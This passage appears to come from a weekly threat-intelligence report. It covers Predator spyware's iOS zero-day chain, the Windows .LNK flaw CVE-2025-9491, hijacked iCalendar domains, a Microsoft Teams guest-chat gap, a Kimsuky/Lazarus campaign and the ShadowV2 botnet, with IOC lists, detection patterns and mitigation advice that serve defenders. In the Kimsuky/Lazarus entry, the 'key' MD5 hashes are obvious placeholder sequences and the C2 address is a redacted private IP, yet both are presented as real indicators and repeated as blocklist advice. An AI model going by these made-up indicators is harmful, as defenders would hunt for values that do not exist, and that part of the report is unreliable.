phishing-resistant MFA for all administrative and privileged accounts. Intellexa Deployed Predator Spyware via iOS Zero-Day Exploit Chain Against Egyptian Targets Sanctioned commercial surveillance vendor Intellexa deployed a three-stage iOS zero-day exploit chain, internally codenamed "smack," against targets in Egypt to install its Predator spyware. The initial stage leveraged a Safari remote code execution zero-day (CVE-2023-41993), which Google assessed Intellexa likely acquired externally due to its use of the "JSKit" framework, previously observed in attacks by other surveillance vendors and Russian government-backed actors. The second stage achieved sandbox escape and privilege escalation by exploiting kernel vulnerabilities CVE-2023-41991 and CVE-2023-41992, providing kernel memory read/write capabilities. The final stage, PREYHUNTER, comprised "helper" and "watcher" modules; the "watcher" module performed anti-detection by monitoring for security tools, specific locale settings, and other anomalies, while the "helper" module used custom frameworks (DMHooker, UMHooker) to hook system functions for VOIP recording, keylogging, and camera capture, also hiding notifications. Intellexa has been linked to 15 zero-day vulnerabilities since 2021, including several Chrome V8 engine exploits (CVE-2021-38003, CVE-2023-4762, CVE-2023-3079, CVE-2023-2033, CVE-2025-6554) observed in Saudi Arabia. Google Threat Intelligence Group and CitizenLab collaborated on this discovery, leading Google to issue warnings to Intellexa's customers across multiple countries and add associated domains to Safe Browsing. Severity: Critical Sources https://gbhackers.com/ios-zero-day/ https://thecyberexpress.com/ios-zero-day-exploit-chain-egypt/ Threat Details and IOCs Malware: Alien, ALIEN, Nova, Predator, PREYHUNTER CVEs: CVE-2021-38003, CVE-2022-42856, CVE-2023-2033, CVE-2023-3079, CVE-2023-41991, CVE-2023-41992, CVE-2023-41993, CVE-2023-4762, CVE-2025-6554 Technologies: Apple iOS, Apple Safari, Google Chrome Threat Actors: Intellexa Attacker Countries: Russia Attacker Hashes: 85d8f504cadb55851a393a13a026f1833ed6db32cb07882415e029e709ae0750, e3314bcd085bd547d9b977351ab72a8b83093c47a73eb5502db4b98e0db42cac Victim Industries: Government, Multimedia, Technology Hardware Victim Countries: Angola, Egypt, Kazakhstan, Mongolia, Pakistan, Saudi Arabia, Tajikistan, Uzbekistan Mitigation Advice Update all corporate and BYOD iOS devices to the latest available OS version to mitigate vulnerabilities CVE-2023-41993, CVE-2023-41991, and CVE-2023-41992. Ensure all Google Chrome and Chromium-based browsers on corporate endpoints are updated to the latest version to protect against CVE-2021-38003, CVE-2023-4762, CVE-2023-3079, CVE-2023-2033, and CVE-2025-6554. Scan managed mobile devices for the presence of unauthorized security research tools such as Bash, tcpdump, frida, sshd, or checkra1n, as these can be indicators of compromise or reconnaissance. Audit managed mobile devices for unauthorized custom HTTP proxy configurations and non-corporate root certificate installations. Compliance Best Practices Implement or enhance a Mobile Device Management (MDM) solution to enforce mandatory and timely OS and application updates on all mobile devices accessing corporate data. Develop and enforce a security policy that enables Apple's Lockdown Mode on iOS devices used by executives and other employees at high risk of being targeted by sophisticated spyware. Establish a continuous security awareness training program that educates users on how to identify and report phishing attempts and suspicious links on mobile devices. Implement and maintain network egress filtering to block outbound connections from all corporate devices to known malicious domains and un-categorized websites. Use MDM to establish and enforce a policy that prohibits the use of Developer Mode on all corporate-managed iOS devices unless there is a documented and approved business justification. Microsoft Patches Critical Windows .LNK Flaw (CVE-2025-9491) Exploited by State-Sponsored Groups Microsoft has addressed a critical Windows shortcut file (.lnk) vulnerability, tracked as CVE-2025-9491 (ZDI-CAN-25373), which allowed malicious .lnk files to conceal harmful command-line arguments, enabling hidden code execution. This flaw, exploited by at least 11 state-sponsored groups from North Korea, Iran, Russia, and China since 2017 for cyber espionage and data theft, involved padding commands with whitespace to make the "Target" field appear innocuous in Windows properties. Despite initially downplaying its severity, Microsoft issued a "silent mitigation" in its November 2025 Patch Tuesday, which now reveals the full command in the "Properties" dialog. The fix follows a recent campaign by the China-linked UNC6384/Mustang Panda group, which leveraged CVE-2025-9491 in spear-phishing attacks against European diplomatic entities, deploying the PlugX remote access trojan. The .lnk format remains a significant threat due to its ability to bypass email filters and facilitate remote code execution through social engineering, and the risk persists until all vulnerable systems are updated. Severity: Critical Sources https://blog.0patch.com/2025/12/microsoft-silently-patched-cve-2025.html https://cyberpress.org/microsoft-windows-lnk-vulnerability/ https://dataconomy.com/2025/11/24/why-that-harmless-looking-desktop-icon-might-actually-be-a-weapon/ https://gbhackers.com/hackers-actively-exploit-new-windows-lnk-0-day/ https://it.slashdot.org/story/25/12/04/1744255/microsoft-mitigates-windows-lnk-flaw-exploited-as-zero-day?utm_source=rss1.0mainlinkanon&utm_medium=feed https://meterpreter.org/microsoft-finally-patches-lnk-flaw-cve-2025-9491-exploited-by-spies-since-2017/ https://thehackernews.com/2025/12/microsoft-silently-patches-windows-lnk.html https://www.bleepingcomputer.com/news/microsoft/microsoft-mitigates-windows-lnk-flaw-exploited-as-zero-day/ https://www.hendryadrian.com/microsoft-mitigates-windows-lnk-flaw-exploited-as-zero-day/ https://www.techrepublic.com/article/news-microsoft-fixes-security-flaw/ https://www.theregister.com/2025/12/04/microsoft_lnk_bug_fix/ Threat Details and IOCs Malware: CirenegRAT, C_Major, Destroy RAT, DestroyRAT, Dreambot, Farfli, Gh0st, Gh0st RAT, Ghost RAT, Gozi, Gozi-ISFB, HiddenGh0st, Hodur, ISFB, Kaba, Konni, KONNI, Korplug, LDR4, Moudour, Papras, PCrat, PCRat, PlugX, QNAP-Worm, Raspberry Robin, Roshtyak, Snifula, Sogu, SOGU, Storm-0856, SugarGh0st RAT, TheTrick, TIGERPLUG, Trickbot, TrickBot, TrickLoader, Trickster, UpDog, Ursnif, UsrRunVGA.exe, XDigo CVEs: CVE-2025-9491 Technologies: Microsoft Windows, Microsoft Windows Server Threat Actors: APT10, APT15, APT17, APT20, APT21, APT22, APT26, APT27, APT3, APT31, APT37, APT40, APT41, APT43, Barium, Bitter, BronzePresident, BronzeUnion, Daggerfly, DoubleDragon, DragonOK, EarthIktomi, EarthLusca, EarthPreta, EmissaryPanda, EvilCorp, HazyTiger, Hellsing, HurricanePanda, Kimsuky, Konni, LuckyMouse, MenuPass, MUSTANGPANDA, OpalSleet, RazorTiger, RedDelta, RedHotel, SadFuture, SAMURAIPANDA, Sidewinder, TA416, TA505, TEMPHex, TwillTyphoon, UNC1878, UNC6384, VelvetAnt, WaterPoukai, WickedPanda, WickedSpider, WIZARDSPIDER, XDSpy Attacker Countries: China, India, Iran, North Korea, Russia Attacker IPs: 195.154.152.70 Attacker Domains: cseconline.org, d32tpl7xt7175h.cloudfront.net, dorareco.net, mydownload.z29.web.core.windows.net, naturadeco.net, paquimetro.net, racineupci.org, vnptgroup.it.com Victim Industries: Aerospace, Civic and Social Organizations, Defense, Education, Energy, Financial, Financial Services, Government, Healthcare, Mining, Non-Governmental Organizations (NGOs), Technology Hardware, Telecommunications Victim Countries: Afghanistan, Algeria, Australia, Austria, Bangladesh, Belarus, Belgium, Bhutan, Brazil, Bulgaria, Cambodia, China, Cyprus, Czech Republic, Djibouti, Egypt, Estonia, Ethiopia, Finland, France, Germany, Greece, Hong Kong, Hungary, India, Indonesia, Ireland, Italy, Japan, Kuwait, Laos, Latvia, Malaysia, Maldives, Moldova, Mongolia, Mozambique, Myanmar, Nepal, Netherlands, Nigeria, Pakistan, Palestine, Philippines, Romania, Russia, Rwanda, Saudi Arabia, Serbia, Singapore, Slovakia, South Africa, South Korea, Sri Lanka, Sudan, Sweden, Taiwan, Thailand, Turkey, Uganda, Ukraine, United Arab Emirates, United Kingdom, United States, Vatican City, Vietnam Mitigation Advice Prioritize and deploy the November 2025 Microsoft Patch Tuesday security updates to all Windows endpoints and servers to apply the mitigation for CVE-2025-9491. Conduct a threat hunt across all endpoints for indicators of compromise related to this campaign, such as anomalous PowerShell execution originating from .lnk files, evidence of the PlugX RAT, and signs of DLL sideloading. Configure your email security gateway to block or quarantine all incoming emails containing .lnk file attachments, including those within compressed archives like .zip files. Issue an immediate security alert to all employees, warning them not to open or click on unexpected shortcut (.lnk) files, especially those received in emails, and to report any suspicious emails to the security team. Compliance Best Practices Implement an application allowlisting policy, such as Windows Defender Application Control (WDAC), to restrict the execution of unauthorized applications and scripts on endpoints. Enable PowerShell Script Block Logging and Module Logging on all Windows systems and forward these logs to a centralized SIEM for monitoring and alerting on suspicious script execution. Deploy or tune an Endpoint Detection and Response (EDR) tool to create detection rules for suspicious process chains, such as explorer.exe spawning a .lnk file which then launches PowerShell or cmd.exe. Establish a continuous security awareness training program that includes regular phishing simulations using lures with various attachment types, including shortcuts and archives, to train users to identify and report threats. Enforce the principle of least privilege by removing local administrator rights from all standard user accounts to contain the impact of malware execution. Stay updated on emerging threats: sign up for the F5 Threat Report to receive the Weekly Threat Report in your inbox.F5 Threat Report - December 3rd, 2025
Hundreds of Abandoned iCalendar Sync Domains Put Nearly 4 Million Devices at Risk A study has revealed that over 390 abandoned or hijacked iCalendar sync domains are still receiving daily synchronization requests from nearly 4 million iOS and macOS devices, posing significant security risks. When users subscribe to external calendars, their devices automatically fetch updates via .ics files, and attackers can register expired domains to serve malicious .ics files. These files can contain harmful event links, phishing URLs, or prompts for unwanted applications, appearing legitimate within users' calendars. Apple devices' calendar sync daemons, identified by user-agent strings like `dataaccessd/1.0`, continuously request updates. Further investigation linked these hijacked servers to JavaScript payloads that trick users into granting push notification permissions or subscribing to spam calendars, often overlapping with large-scale notification scam campaigns and infrastructure previously compromised by Balada Injector malware. While most attacks leverage social engineering, some campaigns have distributed weaponized .ics files exploiting vulnerabilities such as CVE-2025-27915 in Zimbra, allowing JavaScript execution without user interaction. Security experts warn that calendar-based threats are an overlooked attack vector, recommending that organizations review active calendar subscriptions, implement whitelist-based firewall rules, and include calendar security in employee awareness training to mitigate risks from large-scale phishing, malware delivery, and data harvesting. Severity: Critical Sources https://cyberpress.org/icalendar-sync-domains/ https://www.hkcert.org/security-bulletin/zimbra-multiple-vulnerabilities_20251107 Threat Details and IOCs Malware: Balada Injector CVEs: CVE-2025-27915 Technologies: Apple iOS, Apple macOS, Zimbra Collaboration Threat Actors: APT28, UNC1151 Attacker IPs: 193.29.58.37 Attacker Emails: spam_to_junk@proton.me Attacker Domains: 0.allowandgo.com, 0.blueandbesthome.com, 0.mo12.biz, 1downloadss0ftware.xyz, bestresulttostart.com, ffrk.net, linetoslice.com, linetowaystrue.com, mo17.biz, mos3.biz, perfectlinestarter.com, readytocheckline.com, recordsbluemountain.com, taskscompletedlists.com, topwebsites1d.com Attacker URLs: http://mos3.biz/?webcal=me2tanrymi5gi3bpgu4tmna&u=230c9837-23ee-4208-8df0-1fa854490c90&l=24&t=1620652575&g=3&al=ar&sub1=&sub2=&sub3=&sub4=b0690ftho9zwh124, https://mo17.biz/?p=gy3ggyrzgm5gi3bpgy2dsny, https://mo17.biz/?webcal=me2tanrymi5gi3bpgu4tmna&u=230c9837-23ee-4208-8df0-1fa854490c90&l=24&t=1620652575&g=3&al=ar&sub1=&sub2=&sub3=&sub4=b0690ftho9zwh124, hxxps://ffrk.net/apache2_config_default_51_2_1 Attacker Hashes: e05c546f30212173ba878c31bbd8b93216cab1e847676b7bae870719f37dd7a5 Victim Industries: Government, Technology Hardware Victim Countries: Brazil, China Mitigation Advice Instruct all users to immediately review their calendar subscriptions on all corporate and BYOD Apple devices (iOS and macOS) and remove any unrecognized or unnecessary subscriptions. Configure network monitoring tools to create alerts for outbound traffic from Apple devices that contains both the user-agent 'dataaccessd/1.0' and the 'Accept: text/calendar' header, destined for non-standard or uncategorized domains. If your organization uses the Zimbra Collaboration Suite, immediately apply the vendor-supplied patches to mitigate the actively exploited cross-site scripting vulnerability, CVE-2025-27915. Send an immediate security bulletin to all employees warning them about the risks of unsolicited calendar events and browser push notification prompts. Instruct them to decline all unexpected requests to 'Allow' notifications and to avoid clicking links in suspicious calendar entries. Compliance Best Practices Develop and implement a network firewall policy that whitelists approved domains for iCalendar synchronization and blocks all other outbound requests matching the 'dataaccessd/1.0' user-agent. Update the corporate security awareness training program to include a dedicated module on the risks of calendar subscriptions, phishing via calendar events, and social engineering tactics used in browser push notification scams. Develop and deploy a Mobile Device Management (MDM) configuration profile to restrict or disable the ability for users to add arbitrary calendar subscriptions on corporate-managed iOS and macOS devices. Configure the email security gateway to specifically inspect incoming `.ics` file attachments for malicious links and embedded scripts, and consider implementing content disarm and reconstruction (CDR) for these files. Microsoft Teams Guest Chat Flaw Could Let Hackers Deliver Malware A critical vulnerability in Microsoft Teams guest chat allows attackers to bypass Defender for Office 365 protections by exploiting an architectural gap in cross-tenant collaboration. When users accept guest invitations to external Teams tenants, they fall under the hosting tenant's security policies, which attackers can disable in low-cost Microsoft 365 tenants lacking Defender for Office 365. The November 2025 rollout of feature MC1182004, enabling chats with anyone via email by default, makes this attack practical, allowing attackers to invite targets to their unprotected environments and deliver phishing or malware without detection. To mitigate this, organizations should restrict B2B guest invitations to trusted domains via Microsoft Entra ID, configure granular cross-tenant access policies, limit external Teams communication to specific domains through the Teams Admin Center, and consider disabling the MC1182004 feature using the PowerShell command `Set-CsTeamsMessagingPolicy -UseB2BInvitesToAddExternalUsers $false`. This issue highlights that security protections follow the resource tenant, a distinction organizations must address to prevent sophisticated attacks. Severity: Critical Sources https://buaq.net/go-378428.html https://gbhackers.com/microsoft-teams-guest-chat-flaw/ https://hackread.com/microsoft-teams-guest-chat-flaw-malware/ Threat Details and IOCs Technologies: Microsoft 365, Microsoft Entra ID, Microsoft Teams Attacker Emails: email protected Victim Industries: Critical Manufacturing, Financial, Government Mitigation Advice In Microsoft Entra ID, navigate to 'External Identities' -> 'External collaboration settings' and change the 'Guest invite settings' to 'Allow invitations only to specified domains'. Populate the list with currently known and trusted partner domains. In the Microsoft Teams Admin Center, under 'Users' -> 'External access', set the policy for Teams and Skype for Business users in external organizations to 'Allow only specific external domains' and add the domains of trusted business partners. Use PowerShell to connect to your Microsoft Teams instance and run the command 'Set-CsTeamsMessagingPolicy -Identity Global -UseB2BInvitesToAddExternalUsers $false' to disable the ability for users to start chats with external users using just an email address. In Microsoft Entra ID, under 'External Identities' -> 'Cross-tenant access settings', configure the default settings to block all inbound and outbound B2B collaboration and B2B direct connect access for both users and applications. Compliance Best Practices Develop and implement a formal policy and process for vetting, approving, and periodically reviewing external organizations for Teams collaboration. Use this process to manage the allowlists in Entra ID's cross-tenant access settings and the Teams Admin Center. Develop and deploy a recurring security awareness training module that specifically educates users on the risks of accepting Microsoft Teams guest invitations from unknown organizations. The training should explain that security protections do not carry over and should instruct users on how to verify and report suspicious invitations. DPRK-Linked Kimsuky and Lazarus Coordinate Espionage and Financial Theft via CVE-2024-38193 Kimsuky and Lazarus operate a coordinated campaign, combining Kimsuky's precise espionage with Lazarus's financial theft capabilities, both under DPRK control. Kimsuky initiates attacks through academic-themed spearphishing, using malicious HWP and MSC attachments to harvest credentials and reconnaissance data, deploying backdoors like FPSpy and the KLogEXE keylogger. Lazarus then leverages zero-day Windows privilege escalation, specifically CVE-2024-38193, and malicious Node.js packages to gain SYSTEM privileges and deploy the InvisibleFerret backdoor for cryptocurrency wallet theft. The groups share C2 infrastructure, intelligence, and tools, employing advanced evasion techniques such as encrypted/HTTP-like C2 traffic, multi-layer packing (Fudmodule), domain rotation, and anti-EDR capabilities to avoid detection. This collaboration has resulted in the rapid exfiltration of sensitive documents and significant cryptocurrency thefts, including a single incident of $32 million and over $120 million cumulatively since 2024. The campaign utilizes various MITRE ATT&CK techniques, including Phishing (T1566), Input Capture (T1056), Exploitation for Privilege Escalation (T1068), Command and Scripting Interpreter (T1059), Ingress Tool Transfer (T1105), Boot or Logon Autostart Execution (T1547), Obfuscated Files or Information (T1027), Application Layer Protocol (T1071), Exfiltration Over C2 Channel (T1041), Valid Accounts (T1078), and Domain Policy Modification (T1484). Key indicators of compromise include FPSpy (MD5: a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6) and InvisibleFerret (MD5: f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1) hashes, shared C2 IP addresses like 192.168.xxx.xxx, the academic lure domain academic-symposium[.]info, and the exploitation of CVE-2024-38193. Severity: Critical Sources https://buaq.net/go-375362.html https://buaq.net/go-376034.html https://cyberpress.org/exploiting-code-hosting-platforms/ https://cyberpress.org/north-korean-job-fraud/ https://gbhackers.com/json-storage/ https://securityonline.info/north-koreas-contagious-interview-apt-uses-json-keeper-and-gitlab-to-deliver-beavertail-spyware/ https://slowmist.medium.com/explanation-msmt-the-dprks-violation-and-evasion-of-un-sanctions-via-cyber-and-it-worker-e2a674d3a2c5?source=rss-4ceeedda40e8------2 https://thehackernews.com/2025/11/north-korean-hackers-turn-json-services.html https://www.hendryadrian.com/inside-dprks-fake-job-platform-targeting-u-s-ai-talent-validin/ https://www.hendryadrian.com/kimsuky-and-lazarus-coordinated-campaign/ https://www.hendryadrian.com/kimsuky-health-checkup-email-malware/ Threat Details and IOCs Malware: Agenda, AkdoorTea, AlphaSeed, AppleJeus, AppleSeed, ATMDtrack, BabyShark, Beavertail, BeaverTail, Dtrack, FPSpy, FudModule, InfoKey, InvisibleFerret, JamBog, Kaiten, KGH_SPY, KLogEXE, MoonPeak, OtterCookie, Play, Playcrypt, Qilin, RokRAT, TrollAgent, Troll Stealer, Tropidoor, Tsunami, TsunamiKit, XenoRAT, XORIndex CVEs: CVE-2017-0199, CVE-2018-13379, CVE-2019-0708, CVE-2020-12812, CVE-2022-42475, CVE-2023-27532, CVE-2023-27997, CVE-2024-21762, CVE-2024-27198, CVE-2024-38193, CVE-2024-55591 Technologies: Apple macOS, Atlassian Bitbucket, BtcTurk, Bybit, DMM Bitcoin, ESTsoft ALZIP, Exclusible, GitHub, GitLab, Google Chrome, Hancom Hangul Word Processor, JSONsilo, Keeper, LinkedIn, Linux, MetaMask, Microsoft .NET Framework, Microsoft Windows, Munchables, Node.js, npm, npoint.io, OnyxDAO, Pastebin, Phantom, Python, Radiant Capital, TronLink, WazirX Threat Actors: Agenda, AlluringPisces, Andariel, APT37, APT38, APT43, APT45, Beavertail, BlackBanshee, Bluenoroff, CitrineSleet, CL-STA-0240, CryptoCore, DeceptiveDevelopment, DEV#POPPER, EmeraldSleet, FamousChollima, GleamingPisces, GwisinGang, InvisibleFerret, JadeSleet, Kimsuky, Lazarus, LazarusGroup, MoonstoneSleet, OnyxSleet, OtterCookie, Qilin, SapphireSleet, SilentChollima, SparklingPisces, StardustChollima, Temp.Hermit, TenaciousPungsan, Thallium, TraderTraitor, UNC4899, UNC5342, VelvetChollima, VoidDokkaebi, WageMole Attacker Countries: North Korea, Russia Attacker IPs: 104.200.67.96, 107.189.25.109, 144.172.100.142, 144.172.103.97, 144.172.95.226, 144.172.97.7, 146.70.253.10, 146.70.253.107, 147.124.197.138, 147.124.197.149, 147.124.212.146, 147.124.212.89, 147.124.214.129, 147.124.214.131, 147.124.214.237, 165.140.86.227, 167.88.36.13, 172.86.84.38, 172.86.98.240, 173.211.106.101, 185.153.182.241, 185.235.241.208, 216.126.229.166, 216.189.150.185, 23.106.253.194, 23.106.253.215, 23.106.253.221, 23.106.253.242, 23.106.70.154, 23.227.202.242, 23.227.202.244, 23.254.164.156, 38.92.47.151, 38.92.47.85, 38.92.47.91, 45.128.52.14, 45.137.213.30, 45.43.11.201, 45.61.133.110, 45.61.150.30, 45.61.150.31, 45.61.151.71, 45.76.160.53, 5.253.43.122, 66.235.168.232, 66.235.175.109, 67.203.7.163, 67.203.7.171, 69.62.86.78, 72.61.9.45, 86.104.74.51, 88.218.0.78, 94.131.97.195, 95.164.17.24 Attacker Emails: ahmadbahai07@gmail.com, drgru854@gmail.com, jackhill2765@gmail.com, jack.murray.tf7@gmail.com, magalhaesbruno236@gmail.com, reichenausteve@gmail.com, stromdev712418@gmail.com, trungtrinh0818@gmail.com Attacker Domains: advisorflux.com, api.jsonsilo.com, api.npoint.io, app.lenvny.com, assureeval.com, bitbucket.org, bloxholder.com, carrerlilla.com, cloudflariz.com, cookiemanager.ne.kr, effertz-carroll.com, evangelia.edu, freeconference.io, ftpserver0909.com, generated.photos, github.com, gitlab.com, ipcheck.cloud, jsonkeeper.com, jsonsilo.com, kupaywallet.com, lenvny.com, load.samework.o-r.kr, mirotalk.io, mirotalk.net, n34kr3z26f3jzp4ckmwuv5ipqyatumdxhgjgsmucc65jac56khdy5zqd.onion, naverbox.pe.kr, nidiogln.ne.kr, npoint.io, pastebin.com, railway.app, regioncheck.net, thispersondoesntexist.com, unioncrypto.vip, wud.wuaze.com, www.jsonkeeper.com Attacker URLs: http://147.124.214.129:1244, http://173.211.106.101:1245, https://app.lenvny.com/cam-v-abc123.fix, hxxp://146.70.253.107:1224/client/99/81, hxxp://146.70.253.107:1224/pdown, hxxp://23.254.164.156/introduction-video, hxxp://n34kr3z26f3jzp4ckmwuv5ipqyatumdxhgjgsmucc65jac56khdy5zqd.onion, hxxps://api.jsonsilo.com/public/0048f102-336f-45dd-aef6-3641158a4c5d, hxxps://api.jsonsilo.com/public/942acd98-8c8c-47d8-8648-0456b740ef8b, hxxps://api.npoint.io/03f98fa639fa37675526, hxxps://api.npoint.io/148984729e1384cbe212, hxxps://api.npoint.io/2169940221e8b67d2312, hxxps://api.npoint.io/336c17cbc9abf234d423, hxxps://api.npoint.io/38acf86b6eb42b51b9c2, hxxps://api.npoint.io/62755a9b33836b5a6c28, hxxps://api.npoint.io/832d58932fcfb3065bc7, hxxps://api.npoint.io/8df659fd009b5af90d35, hxxps://api.npoint.io/a1dbf5a9d5d0636edf76, hxxps://api.npoint.io/cb0f9d0d03f50a5e1ebe, hxxps://api.npoint.io/e6a6bfb97a294115677d, hxxps://api.npoint.io/f4be0f7713a6fcdaac8b, hxxps://api.npoint.io/f6dd89c1dd59234873cb, hxxps://github.com/0x3ca54/arena-world, hxxps://github.com/adammajoros250-creator/123456ddd, hxxps://github.com/adammajoros250-creator/alex111, hxxps://github.com/adammajoros250-creator/Apexora-test, hxxps://github.com/adammajoros250-creator/bot111, hxxps://github.com/adammajoros250-creator/corex-arc-fork, hxxps://github.com/adammajoros250-creator/demotest, hxxps://github.com/carlotalentengine-sketch, hxxps://github.com/edwardtam919/staking-platform-main, hxxps://github.com/harrypotter060327-netizen/David-test, hxxps://github.com/harrypotter060327-netizen/eeeee, hxxps://github.com/harrypotter060327-netizen/Harry-Potter, hxxps://github.com/harrypotter060327-netizen/Test_Estoken, hxxps://github.com/harrypotter060327-netizen/TEST_LORD, hxxps://github.com/harrypotter060327-netizen/test_project, hxxps://github.com/InfiniGods-Tech/rei, hxxps://github.com/meta-stake/RaceStake, hxxps://github.com/meta-stake/RealEstateVC, hxxps://github.com/parth5805/iGuru-Task, hxxps://github.com/TommyMinion/DeFi-Market, hxxps://gitlab.com/goldencity-group/goldencity-demo, hxxps://gitlab.com/real-world-assest-tokenization/goldencity, hxxps://gitlab.com/technicalmanager-group/real-esate, hxxps://jsonkeeper.com/b/4NAKK, hxxps://jsonkeeper.com/b/6OCFY, hxxps://jsonkeeper.com/b/86H03, hxxps://jsonkeeper.com/b/8RLOV, hxxps://jsonkeeper.com/b/BADWN, hxxps://jsonkeeper.com/b/E4YPZ, hxxps://jsonkeeper.com/b/FM8D6, hxxps://jsonkeeper.com/b/GCGEX, hxxps://jsonkeeper.com/b/GNOX4, hxxps://jsonkeeper.com/b/IARGW, hxxps://jsonkeeper.com/b/IXHS4, hxxps://jsonkeeper.com/b/JV43N, hxxps://pastebin.com/u/AmendMinds7934, hxxps://pastebin.com/u/AmendMinds7934_LoverTumor2853, hxxps://pastebin.com/u/AmendMinds7934LoverTumor2853, hxxps://pastebin.com/u/NotingRobe2871, hxxps://pastebin.com/u/NotingRobe2871_FranzStill8494, hxxps://pastebin.com/u/NotingRobe2871FranzStill8494, hxxps://pastebin.com/u/ShadowGates1462, hxxps://pastebin.com/u/ShadowGates1462_PastPhys9067, hxxps://pastebin.com/u/ShadowGates1462PastPhys9067, hxxps://www.jsonkeeper.com/b/JNGUQ, hxxps://www.jsonkeeper.com/b/O2QKK, hxxps://www.jsonkeeper.com/b/RZATI, hxxps://www.jsonkeeper.com/b/T7Q4V, hxxps://www.jsonkeeper.com/b/VBFK7 Attacker Hashes: 3aed5502118eb9b8c9f8a779d4b09e11, 5e2186e65f84726e8c8284d48db66805fc7e02ce43a73a7ac6bf5a5fff3a35e2, 84d25292717671610c936bca7f0626f5, 94ef379e332f3a120ab16154a7ee7a00, 9d9a25482e7e40e8e27fdb5a1d87a1c12839226c85d00c6605036bd1f4235b21, b29ddcc9affdd56a520f23a61b670134 Victim Industries: Construction, Cryptocurrency, Defense Industrial Base, Education, Financial Services, Financial Technology, Government, Healthcare, Information Technology, Insurance, Market Research, Real Estate, Software, Technology Hardware Victim Countries: Argentina, Brazil, Cambodia, Canada, China, Colombia, Costa Rica, Egypt, Equatorial Guinea, France, Germany, Guinea, India, Indonesia, Japan, Kenya, Laos, Mexico, Netherlands, Nigeria, Pakistan, Philippines, Portugal, Russia, Serbia, South Korea, Tanzania, Turkey, United Arab Emirates, United Kingdom, United States, Vietnam Mitigation Advice Immediately apply the security patch for CVE-2024-38193 to all vulnerable Windows systems. Block the domain 'academic-symposium[.]info' at the web proxy, DNS firewall, and email gateway. Add the file hashes for FPSpy (MD5: a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6) and InvisibleFerret (MD5: f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1) to your Endpoint Detection and Response (EDR) and antivirus blocklists. Configure email security gateways to block or quarantine incoming emails with HWP and MSC file attachments. Run threat hunting queries in your SIEM and EDR to search for suspicious process behaviors, such as HWP files spawning 'winlogon.exe' or any process accessing cryptocurrency wallet paths like '%APPDATA%\MetaMask'. Compliance Best Practices Develop and implement a mandatory, recurring security awareness training program that focuses on identifying spearphishing emails and the risks of handling unsolicited attachments or links. Implement application control policies, such as AppLocker, to restrict the execution of unauthorized scripts and executables, particularly in developer environments. Establish a secure software development lifecycle (SDLC) policy that includes vetting all third-party libraries, such as those from npm, for known vulnerabilities or malicious code before they are approved for use. Implement regular auditing and alerting for any modifications to Group Policy Objects (GPOs) to quickly detect unauthorized changes used for lateral movement. Implement network segmentation to isolate critical assets, such as domain controllers and servers handling financial data, from the general user network. Deploy a network security solution capable of TLS inspection to decrypt and analyze outbound web traffic for signs of command-and-control (C2) activity. Establish and enforce a corporate policy that requires all company-managed cryptocurrency assets to be stored in hardware wallets and prohibits the use of software wallets on networked endpoints. ShadowV2 Botnet Exploits AWS Outage to Infect IoT Devices in 28 Countries A Mirai-based botnet, ShadowV2, emerged during a widespread AWS outage last October, infecting IoT devices across 28 countries and multiple sectors including technology, retail, government, and education. This activity, potentially a "test run" for future attacks, involved the botnet exploiting vulnerabilities in devices from vendors like DD-WRT (CVE-2009-2765), D-Link (CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915), DigiEver (CVE-2023-52163), TBK (CVE-2024-3721), and TP-Link (CVE-2024-53375). The infection process involved dropping a `binary.sh` downloader that delivered "shadow" prefixed malware binaries from 81[.]88[.]18[.]108, utilizing an XOR-encoded configuration to connect to a command-and-control server for DDoS attacks, and displaying the string "ShadowV2 Build v1.0.0 IoT version." While ShadowV2's observed activity was limited to the outage period, its emergence underscores the persistent vulnerability of IoT devices, a point further highlighted by a subsequent 15.72 Tbps DDoS attack on Azure by the Aisuru botnet, which was successfully mitigated. Severity: Critical Sources https://cyberpress.org/shadowv2-malware/ https://dataconomy.com/2025/11/27/shadowv2-botnet-exploited-aws-outage-timeline-to-test-global-iot-attacks/ https://www.bleepingcomputer.com/news/security/new-shadowv2-botnet-malware-used-aws-outage-as-a-test-opportunity/ https://www.fortinet.com/blog/threat-research/shadowv2-casts-a-shadow-over-iot-devices https://www.securitylab.ru/news/566583.php https://www.securitylab.ru/news/566590.php https://www.theregister.com/2025/11/26/miraibased_botnet_shadowv2/ Threat Details and IOCs Malware: Airashi, Aisuru, Bash0day, Bashlite, BASHLITE, boatnet, Gafgyt, Gayfemboy, Hakai, Katana, LizardStresser, Lizkebab, Lzrd, LZRD, Miori, Mirai, Okiru, Pandora, Qbot, Satori, ShadowV2, SpeakUp, Torlus, TurboMirai, Yowai CVEs: CVE-2009-2765, CVE-2020-25506, CVE-2022-37055, CVE-2023-52163, CVE-2024-10914, CVE-2024-10915, CVE-2024-3721, CVE-2024-53375 Technologies: Amazon Web Services, DD-WRT, Digiever, Digiever Network Video Recorders, D-Link, D-Link GO-RT-AC750, D-Link ShareCenter, Linux, TBK, TBK DVRs, TP-Link, TP-Link Archer Threat Actors: LZRD Attacker IPs: 198.199.72.27, 23.97.62.139, 81.88.18.108 Attacker Domains: silverpath.shadowstresser.info Attacker Hashes: 0408d57c5ded5c79bf1c5b15dfde95547e17b81214dfc84538edcdbef4e61ffe, 22aa3c64c700f44b46f4b70ef79879d449cc42da9d1fe7bad66b3259b8b30518, 24ad77ed7fa9079c21357639b04a526ccc4767d2beddbd03074f3b2ef5db1b69, 499a9490102cc55e94f6a9c304eea86bbe968cff36b9ac4a8b7ff866b224739f, 5b5daeaa4a7e89f4a0422083968d44fdfe80e9a32f25a90bf023bca5b88d1e30, 6f1a5f394c57724a0f1ea517ae0f87f4724898154686e7bf64c6738f0c0fb7b6, 7dfbf8cea45380cf936ffdac18c15ad91996d61add606684b0c30625c471ce6a, 80ee2bf90545c0d539a45aa4817d0342ff6e79833e788094793b95f2221a3834, bb326e55eb712b6856ee7741357292789d1800d3c5a6be4f80e0cb1320f4df74, c0ac4e89e48e854b5ddbaef6b524e94cc86a76be0a7a8538bd3f8ea090d17fc2, c62f8130ef0b47172bc5ec3634b9d5d18dbb93f5b7e82265052b30d7e573eef3, cb42ae74216d81e87ae0fd51faf939b43655fe0be6740ac72414aeb4cf1fecf2, dfaf34b7879d1a6edd46d33e9b3ef07d51121026b8d883fdf8aced630eda2f83 Victim Industries: Education, Government, Hospitality, Information Technology, Managed Service Providers, 